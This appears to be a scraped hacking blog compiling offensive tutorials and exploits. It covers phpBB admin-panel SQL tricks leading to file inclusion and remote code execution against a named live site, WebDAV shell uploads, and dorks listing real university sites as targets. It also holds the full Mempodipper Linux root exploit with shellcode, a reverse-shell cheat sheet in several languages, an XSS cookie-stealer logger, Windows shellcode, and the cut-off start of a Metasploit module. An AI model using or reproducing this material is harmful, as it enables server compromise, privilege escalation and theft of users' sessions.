It's a shorter process then shelling phpBB3 forums, depending on what the server configuration is....

Once you've got your admin access, log into the admin panel and open up notepad.
On the left, you will see restore database.

It should take you to a page that looks like this...

Now paste this in notepad, and save it as exploit.SQL

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_USER_ID;

In my case, my user id is 2. Also, your table name might not always be phpbb_users. You can guess it if you don't know it..

Now upload your exploit.SQL file in the restore database page, and click start restore.

Code:
Database Utilities : Restore
The Database has been successfully restored.

Your board should be back to the state it was when the backup was made.

Now click on Forum Index on the left, and click profile.

Now the PHP Information should be displayed on the page. This is important, it shows what limits you, and what commands you can execute.

On my site, allow_url_fopen and allow_url_include are set to on. This means I can include a local file, or a remote file depending on what functions are disabled on the server.

If you can use either of these methods, you can create a Local/Remote File Inlcusion vulnerability on the web page.
Here are some examples of LFI and RFI..

Remote File Inclusion

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include($_GET[RFI])' WHERE user_id=2;

Go back to your restore database file, and re upload your exploit and repeat the same process...

Code:
Warning: include() [function.include]: Filename cannot be empty in /home/timwan/public_html/messageboard/includes/usercp_register.php(814) : regexp code on line 1

Now you select your remote file like this when you load the webpage..

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&RFI=http://site.com/shell.txt?

You can use the same thing, and use local files to exploit the vulnerability.

Local File Inlcusion

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include($_GET[LFI])' WHERE user_id=2;

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&LFI=/proc/self/status

Name: php State: R (running) Tgid: 4517 Pid: 4517 PPid: 2788 TracerPid: 0 Uid: 32264 32264 32264 32264 Gid: 32266 32266 32266 32266 FDSize: 4096 Groups: 32266 VmPeak: 36068 kB VmSize: 36068 kB VmLck: 0 kB VmHWM: 14768 kB VmRSS: 14768 kB VmData: 5108 kB VmStk: 136 kB VmExe: 6520 kB VmLib: 22788 kB VmPTE: 112 kB VmSwap: 0 kB Threads: 1 SigQ: 0/96476 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: fffffffe3bfbe007 SigIgn: 0000000000001000 SigCgt: 0000000184000000 CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: ffffffffffffffff Cpus_allowed: 0004 Cpus_allowed_list: 2 voluntary_ctxt_switches: 11 nonvoluntary_ctxt_switches: 1

Now you could exploit through the process environment file, logs, or whatever else depending on what you have permissions to, or if a firewall is installed. Unforunately for me, this site has a hell of an annoying WAF.

Remote Code Execution

Now, if any of these are disabled, you're going to have some trouble. If not, we can move on to RCE through our SQL query.

Code:
system
exec
shell_exec
passthru

Now you can do something like this depending on whether the site has magic quotes enabled or not.

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system('wget http://www.site.com/shell.txt -O shell.php');' WHERE user_id=2;

Unforunately, I get syntax errors because magic quotes won't work. Now there's other methods that come in handy, using $GET requests.

Code:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[CMD])' WHERE user_id=2;

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=ls -lua

There's that stupid WAF...

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=ls

Now you can download your shell, and pwn that server!

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=wget http://www.site.com/shell.txt
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=mv shell.txt shell.php

Then you can re check if your shell is on there.

Code:
http://passfailstudios.com/messageboard/profile.php?mode=editprofile&CMD=ls

Credits

Couldn't find the actual author of the exploit, but credit goes to whoever published this on milworm.

Exploit-DB

©2011, copyright BLACK BURN

[TuT] Exploiting Microsoft/IIS 6.0 WebDAV - Uploading Files

2012-01-31T05:28:00.002+06:00

Today I will be teaching a way to exploit very common a vulnerability and upload your shell and/or deface page to a Microsoft IIS 6.0 based website.

What you will need:
A windows machine.
Basic knowledge of shells.
A Microsoft/IIS 6.0 website with WebDAV enabled.
An ASP shell. - http://www.[removed].com/?d=YU209ET7 << Download link for the shell. (Do not even try a PHP shell, it won't work. You can use your ASP shell to upload your PHP shell after though.)

This is how to perform the exploit in Windows 7:
Click start > Computer.
You will see this page: http://img851.imageshack.us/i/iis1.png/[/img]

Next you will want to click "Map network drive", it has been circled in the picture above.
Now a window will pop-up, it should look like this: http://img638.imageshack.us/i/iis2.png/

As you can see again. I have circled what needs to be clicked. So click on that then a window will come up asking you to click "Next", do so. After you have clicked the "Next" button, you should see this: http://img850.imageshack.us/i/iis3.png/

You will need to highlight/click that folder I circled, then hit the "Next" button once again. It should redirect you to this page: http://img21.imageshack.us/i/iis4.png/[/img]

I put "www.vulnerablesite.com" as an example. You have to type in "http://vulnerablesite.com" otherwise it will not work. It requires HTTP, not WWW. You will receive an error unless you use HTTP (once again, http://vulnerablesite.com)
Hit the "Next" button again, then it should come up with the site name with the output "vulnerablesite.com", you can name it whatever you like, this is what I put:http://img130.imageshack.us/i/iis5.png/

Except I changed it to "IIS 6.0 Exploit for HF - Phizo".
It doesn't matter what you put, just make sure you remember it.
Make sure the box is ticked (open when finished) then go ahead and hit finish.
Okay, we've exploited the website. Now we want to upload our files to the website. A new window has just opened, as you can see, we're connected to the websites files, however we're not aloud to view the files as we're unauthorized. No matter, we can still upload our shells and what other files we would like to upload.
Okay, I don't think I will need to put any pictures in this one, it's that simple. Follow my instructions:
#1 - Open the directory of where your ASP shell is (example: desktop, documents, or custom folder). Your ASP shell should have a name similar to "shell.asp;anything.jpg".
#2 - Drag your ASP shell from your custom folder into the website folder we just exploited. It should just go straight in there with no problems.
Tada! We have successfully uploaded our shell! Now all we have to do is go to: http://vulnerablesite.com/shell.asp;anything.jpg.

I hope this helps.
©2011, copyright BLACK BURN

Dorks, using dorks, finding dorks

2012-01-31T05:25:00.001+06:00

[small tut]Dorks, using dorks, finding dorks.
For educational purposes only!

Usefull sites.
You could also look for exclusife dorks and original exploits on:
http://www.exploit-db.com/
http://1337day.com/
http://hackingexpose.blogspot.com/
http://sekurity.tumblr.com/

Dork lists on: SQLI, XSS, LFI, RFI, RTE.

RANDOM very usefull dorks!
http://pastebin.com/sX85tSEY <- gold worth!

SQLI sQl Injection
http://pastebin.com/dzQRHqhu
http://pastebin.com/0FqmasC7 <-from kobez.
http://pastebin.com/x1rtqktj <-from kobez.
http://pastebin.com/APxqavu9 <-from kobez.

XSS Cross Site Scripting
http://pastebin.com/85JiHniy

lfi Local File Inclusion
http://pastebin.com/FBpYuZRh

RFI Remote File Inclusion
http://pastebin.com/zevqd3fR

RTE Remote File Upload
http://pastebin.com/b05LyBm9

LFD Local File Disclosure.
http://pastebin.com/HBLrBL0B
©2011, copyright BLACK BURN

[tut] Creating google dorks

2012-01-31T05:23:00.000+06:00

Hello, Real steel here whit another tutorial!.

In this tutorial i will explain how to create your own dorks,
Advanced dorks!

Do you really think inurl: is the only google dork that you can use?
Wrong there are many you can use!

intitle:
inurl:
intext:
define:
site:
phonebook:
maps:
book:
froogle:
info:
movie:
weather:
related:
link:

These also help yo find other things then vulnerables.
Happy googling!

Anyway i was going to show how to use some for finding fulnerables.

intitle:
intitle:rte/file_uploud (this is an example to find rte vulnerables.)

you can use the intitle to find anything in the title of the website.
which also could be usefull to find downloads or anything else.

inurl:
inurl:index.php?id= (we allready know this one)

The inurl basicly looks for enything after the: in the site urls. (obvious)

intext:
intext:"powered by mybb" (This one is awesome!)

you can find literally everything here.
you could even use the inurl dorks whit this.

anyway whit this we could find sertain messages in a site whe can use.
my message looks for all mybb forums.

which means if i ever find a vulnerable in mybb forum.
and know how to locate it!
then i can find every mybb forum whit this dork.

define:
define:"sql syntax error" (google defines you message)

google will difine this massage and will look for what had this error for example i gave.

site:
Obvious, google looks for a site.
site:cocacola (google will look for any site related whit cocacola.)

phonebook:
Do i really need to explain this?
give in a name and google will look for the phone number related to it.

maps:
Google will look on google maps for your search.

book:
book:java language (this will look for any book gogole hase indexed whit java language in it.)
Google hase an online library.
if you want to find interesting books use this dork.

froogle:
Uses froogle search instead of google.

info:
info:firefox (google uses many info sites.)
This is usefull.
google looks for anything you inputted but only information about it.
the example i gave firefox.
google will get you alot off things explaining what firefox is.

movie:
if you do this,
you can find alot about movies on google.

movie:watch hackers2 online

together whit some of your own context google will serve you any movie.
(movie which is not just a site whit advertisements: grr)
but any movie file usefull for this dork.
have fun watching!

weather:
weather: 21/12/2011 london

Obvious aint it?

related:
related:egg (google responds whit sites about chickons laying eggs.)
this will look for anything related to what you input.

link:
link:index.php?id= (this is verry usefull i would say even more then inurl.)
People always show the inurl methode?
this one works bether instead of only looking in search url it will also look in the site for urls
that possibly are vulnerable.

Happy googling, hacking!
©2011, copyright BLACK BURN

Linux Local Root for => 2.6.39, 32-bit and 64-bit

2012-01-31T05:18:00.002+06:00

# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056

Code:
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    int n;
    int sock;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    buf[0] = 0;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = CMSG_LEN(sizeof(int));
    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
    if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
        return -1;
    close(sock);
    return 0;
}
int recv_fd()
{
    int listener;
    int sock;
    int n;
    int fd;
    char buf[1];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    struct sockaddr_un addr;
    char cms[CMSG_SPACE(sizeof(int))];
    if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
    unlink(socket_path);
    if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        return -1;
    if (listen(listener, 1) < 0)
        return -1;
    if ((sock = accept(listener, NULL, NULL)) < 0)
        return -1;
    iov.iov_base = buf;
    iov.iov_len = 1;
    memset(&msg, 0, sizeof msg);
    msg.msg_name = 0;
    msg.msg_namelen = 0;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = (caddr_t)cms;
    msg.msg_controllen = sizeof cms;
    if ((n = recvmsg(sock, &msg, 0)) < 0)
        return -1;
    if (n == 0)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
    close(sock);
    close(listener);
    return fd;
}
int main(int argc, char **argv)
{
    if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
        char parent_mem[256];
        sprintf(parent_mem, "/proc/%s/mem", argv[2]);
        printf("[+] Opening parent mem %s in child.\n", parent_mem);
        int fd = open(parent_mem, O_RDWR);
        if (fd < 0) {
            perror("[-] open");
            return 1;
        }
        printf("[+] Sending fd %d to parent.\n", fd);
        send_fd(fd);
        return 0;
    }
    printf("===============================\n");
    printf("=          Mempodipper        =\n");
    printf("=           by zx2c4          =\n");
    printf("=         Jan 21, 2012        =\n");
    printf("===============================\n\n");
    int parent_pid = getpid();
    if (fork()) {
        printf("[+] Waiting for transferred fd in parent.\n");
        int fd = recv_fd();
        printf("[+] Received fd at %d.\n", fd);
        if (fd < 0) {
            perror("[-] recv_fd");
            return -1;
        }
        printf("[+] Assigning fd %d to stderr.\n", fd);
        dup2(2, 6);
        dup2(fd, 2);
        unsigned long address;
        if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
            address = strtoul(argv[2], NULL, 16);
        else {
            printf("[+] Reading su for exit@plt.\n");
            // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
            FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
            char result[32];
            result[0] = 0;
            fgets(result, 32, command);
            pclose(command);
            address = strtoul(result, NULL, 16);
            if (address == ULONG_MAX || !address) {
                printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
                printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
                return 1;
            }
            printf("[+] Resolved exit@plt to 0x%lx.\n", address);
        }
        printf("[+] Calculating su padding.\n");
        FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
        char result[256];
        result[0] = 0;
        fgets(result, 256, command);
        pclose(command);
        unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
        unsigned long offset = address - su_padding;
        printf("[+] Seeking to offset 0x%lx.\n", offset);
        lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
        // See shellcode-32.s in this package for the source.
        char shellcode[] =
            "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
            "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
            "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
            "\x80";
#elif defined(__x86_64__)
        // See shellcode-64.s in this package for the source.
        char shellcode[] =
            "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
            "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
            "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
            "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
            "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
        printf("[+] Executing su with shellcode.\n");
        execl("/bin/su", "su", shellcode, NULL);
    } else {
        char pid[32];
        sprintf(pid, "%d", parent_pid);
        printf("[+] Executing child from child fork.\n");
        execl("/proc/self/exe", argv[0], "-c", pid, NULL);
    }
}

Webdav vulnerability google dork. +3,000 sites infected

2012-01-31T04:34:00.000+06:00

Google dork:

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"

or

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY

Just add the /webdav extension to the URL if you found "WebDAV testpage"

So go ahead it's Webdav vulnerability hackable :)

Example:

http://www.hebron.edu/webdav/
http://www.jcjc.edu/webdav/
http://archnet.asu.edu/webdav/
http://mvl.mit.edu/webdav/
http://www.engl.niu.edu/webdav/
http://www.mstc.edu/webdav/

Enjoy.
©2011, copyright BLACK BURN

Having trouble back-connecting? Here ya go!

2012-01-31T04:10:00.001+06:00

Getting quite a few pms about back-connection recently. Heres my cheatsheet on doing it manually using what the server gives you. This is more or less a backup if a) your webshells aren't working, and b) you don't know why you can't back-connect. Hopefully you won't get stuck again.

After doing recon on your target, assess what you have access to and simply cherry-pick from below. Or just try them all, why the hell not.

1. netcat with GAPING_SECURITY_HOLE enabled:

Code:
TARGET:nc 192.168.1.133 8080 -e /bin/bash
ATTACKER:nc -n -vv -l -p 8080

2. netcat with GAPING_SECURITY_HOLE disabled:

Code:
TARGET:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

3. /dev/tcp socket hack

Code:
TARGET:/bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER:nc -n -vv -l -p 8080

4.no nc or dev/tcp installed?

Code:
TARGET:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER:nc -n -vv -l -p 8080

5.backup- no good reason to use ahead of the others

Code:
TARGET:telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
ATTACKER:nc -n -vv -l -p 8080
ATTACKER2:nc -n -vv -l -p 8888

6.straight bash

Code:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7.Inline perl

Code:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8.Python

Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec​t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9.php inline

Code:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby

Code:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

11.xterm (if available)

Code:
xterm -display 10.0.0.1:1

Code:
Php-findsock-shell- designed to bypass egres filtering (fucking firewalls =]) -http://pentestmonkey.net/tools/web-shells/php-findsock-shell

Code:
Weevely- avoid bind shell/reverse shell via console over http - http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html

Code:
WeBaCoo- stealth^2 - http://packetstormsecurity.org/files/108009/webacoo-0.2.zip

But what if I still cant back-connect or nothing happens? - track down the server and take a fucking sledgehammer to it -_-!
©2011, copyright BLACK BURN

Advanced cookie stealer with pagination

2012-01-31T04:05:00.000+06:00

I've worked lately on an cookie logger that makes it much easier browsing cookies and the way it logs it :)

Image :

Installation steps :

1 ) Logger
( logger.php )

PHP Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];$date = date ("j F Y h:i:s A");$ip = $_SERVER['REMOTE_ADDR'];$agent = $_SERVER['HTTP_USER_AGENT'];$referer = $_SERVER['HTTP_REFERER'];$file = fopen('logs.html', 'a');fwrite($file, "<tr><td>\n <font color='#990000' ><b>\n Cookies : </b></font>$cookie <br>\n<font color='#990000' ><b> Date : </b></font> $date <br>\n <font color='#990000' ><b> IP : </b></font> $ip <br>\n<font color='#990000' ><b>\n Referer : </b></font>$referer <br>\n<font color='#990000' ><b> Agent : </b></font> $agent <br>\n<hr><hr><br>\n</td></tr>\n");fclose($file);header( 'Location: http://www.redirectURL.com' ) ;?>

2 ) JS logger
( logger.js )
This to insert it in your XSS directly through

Quote:<script src=http://www.yourwebsite.com/logger.js>

PHP Code:
location.href = 'http://youwebsite.com/logger.php?cookie='+encodeURIComponent(document.cookie); 

3 ) Cookie Logs page

[*]Make a blank logs.html page

[*] ( logs.php )

PHP Code:
<!-- If you wanna highlight a specific words -->

<script type="text/javascript" src="highlight.js"></script><body onload="highlightSearchTerms('Word1');highlightSearchTerms('Word2');highlightSearchTerms​('Word3')">

<head>
  <style type="text/css">

            body
            {
 overflow:visible;
            }
    .pg-normal {
    color: black;
    font-weight: normal;
    text-decoration: none;
    cursor: pointer;
    }
    .pg-selected {
    color: black;
    font-weight: bold;
    text-decoration: underline;
    cursor: pointer;
    }
  </style>

  <script type="text/javascript" src="page.js"></script>
    </head>
<body>
  <center><div id="pageNavPosition"></div></center><br><hr>
  <form action="" method="get" enctype="application/x-www-form-urlencoded">
  <table  id="results">
    <tr>
    <th></th>
    <th></th>
    </tr>

<?php include 'logs.html'; ?>
 </table>
    </form>

    <script type="text/javascript"><!--
  var pager = new Pager('results', 10);
  pager.init();
  pager.showPageNav('pager', 'pageNavPosition');
  pager.showPage(1);
    //--></script>

    </body>
</html> 

[*]page.js [for pagination ]

PHP Code:
function Pager(tableName, itemsPerPage) {
    this.tableName = tableName;
    this.itemsPerPage = itemsPerPage;
    this.currentPage = 1;
    this.pages = 0;
    this.inited = false;

    this.showRecords = function(from, to) {
  var rows = document.getElementById(tableName).rows;
  // i starts from 1 to skip table header row
  for (var i = 1; i < rows.length; i++) {
    if (i < from || i > to)
    rows[i].style.display = 'none';
    else
    rows[i].style.display = '';
  }
    }

    this.showPage = function(pageNumber) {
  if (! this.inited) {
  alert("not inited");
  return;
  }

  var oldPageAnchor = document.getElementById('pg'+this.currentPage);
  oldPageAnchor.className = 'pg-normal';

  this.currentPage = pageNumber;
  var newPageAnchor = document.getElementById('pg'+this.currentPage);
  newPageAnchor.className = 'pg-selected';

  var from = (pageNumber - 1) * itemsPerPage + 1;
  var to = from + itemsPerPage - 1;
  this.showRecords(from, to);
    }

    this.prev = function() {
  if (this.currentPage > 1)
    this.showPage(this.currentPage - 1);
    }

    this.next = function() {
  if (this.currentPage < this.pages) {
    this.showPage(this.currentPage + 1);
  }
    }  

    this.init = function() {
  var rows = document.getElementById(tableName).rows;
  var records = (rows.length - 1);
  this.pages = Math.ceil(records / itemsPerPage);
  this.inited = true;
    }

    this.showPageNav = function(pagerName, positionId) {
  if (! this.inited) {
  alert("not inited");
  return;
  }
  var element = document.getElementById(positionId);

  var pagerHtml = '<span onclick="' + pagerName + '.prev();" class="pg-normal"> &#171 Prev </span> | ';
  for (var page = 1; page <= this.pages; page++)
    pagerHtml += '<span id="pg' + page + '" class="pg-normal" onclick="' + pagerName + '.showPage(' + page + ');">' + page + '</span> | ';
  pagerHtml += '<span onclick="'+pagerName+'.next();" class="pg-normal"> Next »</span>';  

  element.innerHTML = pagerHtml;
    }
} 

[*]highlight.js [ optional ]
This to highlight specific words as its written at the top of logs.php page

PHP Code:
function doHighlight(bodyText, searchTerm, highlightStartTag, highlightEndTag)
{
  // the highlightStartTag and highlightEndTag parameters are optional
  if ((!highlightStartTag) || (!highlightEndTag)) {
    highlightStartTag = "<font style='color:blue; background-color:yellow;'><b>";
    highlightEndTag = "</font></b>";
  }
  var newText = "";
  var i = -1;
  var lcSearchTerm = searchTerm.toLowerCase();
  var lcBodyText = bodyText.toLowerCase();

  while (bodyText.length > 0) {
    i = lcBodyText.indexOf(lcSearchTerm, i+1);
    if (i < 0) {
  newText += bodyText;
  bodyText = "";
    } else {
  // skip anything inside an HTML tag
  if (bodyText.lastIndexOf(">", i) >= bodyText.lastIndexOf("<", i)) {
  // skip anything inside a <script> block
  if (lcBodyText.lastIndexOf("/script>", i) >= lcBodyText.lastIndexOf("<script", i)) {
    newText += bodyText.substring(0, i) + highlightStartTag + bodyText.substr(i, searchTerm.length) + highlightEndTag;
    bodyText = bodyText.substr(i + searchTerm.length);
    lcBodyText = bodyText.toLowerCase();
    i = -1;
  }
  }
    }
  }

  return newText;
}

function highlightSearchTerms(searchText, treatAsPhrase, warnOnFailure, highlightStartTag, highlightEndTag)
{
  if (treatAsPhrase) {
    searchArray = [searchText];
  } else {
    searchArray = searchText.split(" ");
  }

  if (!document.body || typeof(document.body.innerHTML) == "undefined") {
    if (warnOnFailure) {
  alert("Sorry, for some reason the text of this page is unavailable. Searching will not work.");
    }
    return false;
  }

  var bodyText = document.body.innerHTML;
  for (var i = 0; i < searchArray.length; i++) {
    bodyText = doHighlight(bodyText, searchArray[i], highlightStartTag, highlightEndTag);
  }

  document.body.innerHTML = bodyText;
  return true;
}/*
 * This displays a dialog box that allows a user to enter their own
 * search terms to highlight on the page, and then passes the search
 * text or phrase to the highlightSearchTerms function. All parameters
 * are optional.
 */function searchPrompt(defaultText, treatAsPhrase, textColor, bgColor)
{
  // This function prompts the user for any words that should
  // be highlighted on this web page
  if (!defaultText) {
    defaultText = "";
  }

  // we can optionally use our own highlight tag values
  if ((!textColor) || (!bgColor)) {
    highlightStartTag = "";
    highlightEndTag = "";
  } else {
    highlightStartTag = "<font style='color:" + textColor + "; background-color:" + bgColor + ";'>";
    highlightEndTag = "</font>";
  }

  if (treatAsPhrase) {
    promptText = "Please enter the phrase you'd like to search for:";
  } else {
    promptText = "Please enter the words you'd like to search for, separated by spaces:";
  }

  searchText = prompt(promptText, defaultText);

  if (!searchText)  {
    alert("No search terms were entered. Exiting function.");
    return false;
  }

  return highlightSearchTerms(searchText, treatAsPhrase, true, highlightStartTag, highlightEndTag);
}/*
 * This function takes a referer/referrer string and parses it
 * to determine if it contains any search terms. If it does, the
 * search terms are passed to the highlightSearchTerms function
 * so they can be highlighted on the current page.
 */function highlightGoogleSearchTerms(referrer)
{
  // This function has only been very lightly tested against
  // typical Google search URLs. If you wanted the Google search
  // terms to be automatically highlighted on a page, you could
  // call the function in the onload event of your <body> tag,
  // like this:
  //   <body onload='highlightGoogleSearchTerms(document.referrer);'>

  //var referrer = document.referrer;
  if (!referrer) {
    return false;
  }

  var queryPrefix = "q=";
  var startPos = referrer.toLowerCase().indexOf(queryPrefix);
  if ((startPos < 0) || (startPos + queryPrefix.length == referrer.length)) {
    return false;
  }

  var endPos = referrer.indexOf("&", startPos);
  if (endPos < 0) {
    endPos = referrer.length;
  }

  var queryString = referrer.substring(startPos + queryPrefix.length, endPos);
  // fix the space characters
  queryString = queryString.replace(/%20/gi, " ");
  queryString = queryString.replace(/\+/gi, " ");
  // remove the quotes (if you're really creative, you could search for the
  // terms within the quotes as phrases, and everything else as single terms)
  queryString = queryString.replace(/%22/gi, "");
  queryString = queryString.replace(/\"/gi, "");

  return highlightSearchTerms(queryString, false);
}

/*
 * This function is just an easy way to test the highlightGoogleSearchTerms
 * function.
 */
function testHighlightGoogleSearchTerms()
{
  var referrerString = "http://www.google.com/search?q=javascript%20highlight&start=0";
  referrerString = prompt("Test the following referrer string:", referrerString);
  return highlightGoogleSearchTerms(referrerString);
} 

windows/XP sp3 (ENG) cmd.exe Sellcode

2012-01-30T23:03:00.002+06:00

Code:

# Title : windows/XP sp3 (ENG) cmd.exe Sellcode
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform : winDows xp SP3      |  tESTED IN WINDWOS XP SP 3 work
# Type : SHELL CODe WINDWOS
# WARNING : i teste in windows Xp sp3 (ENG) not windwos 7 or windwos sp2 :( thank you ....
###


00402000   8BEC             MOV EBP,ESP
00402002   33FF             XOR EDI,EDI
00402004   57               PUSH EDI
00402005   C645 FC 63       MOV BYTE PTR SS:[EBP-4],63
00402009   C645 FD 6D       MOV BYTE PTR SS:[EBP-3],6D
0040200D   C645 FE 64       MOV BYTE PTR SS:[EBP-2],64
00402011   C645 F8 01       MOV BYTE PTR SS:[EBP-8],1
00402015   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-3]
00402018   50               PUSH EAX
00402019   B8 C793BF77      MOV EAX,msvcrt.system
0040201E   FFD0             CALL EAX
*/

#include "stdio.h"
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC4\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
int main ()
{
int *ret;
ret=(int *)&ret+3;
printf("Shellcode print is : %d\n",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}

vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection

2012-01-30T23:00:00.002+06:00

Code:

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::HttpClient
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
            'Description'    => %q{
                    This module exploits a vulnerability in the 'proc_deutf()' function
                defined in /includes/functions_vbseocp_abstract.php. User input passed through
                'char_repl' POST parameter isn't properly sanitized before being used in a call
                to preg_replace() function which uses the 'e' modifier. This can be exploited to
                inject and execute arbitrary code leveraging the PHP's complex curly syntax.
            },
            'Author'         => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    ['BID', '51647'],
                    ['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],
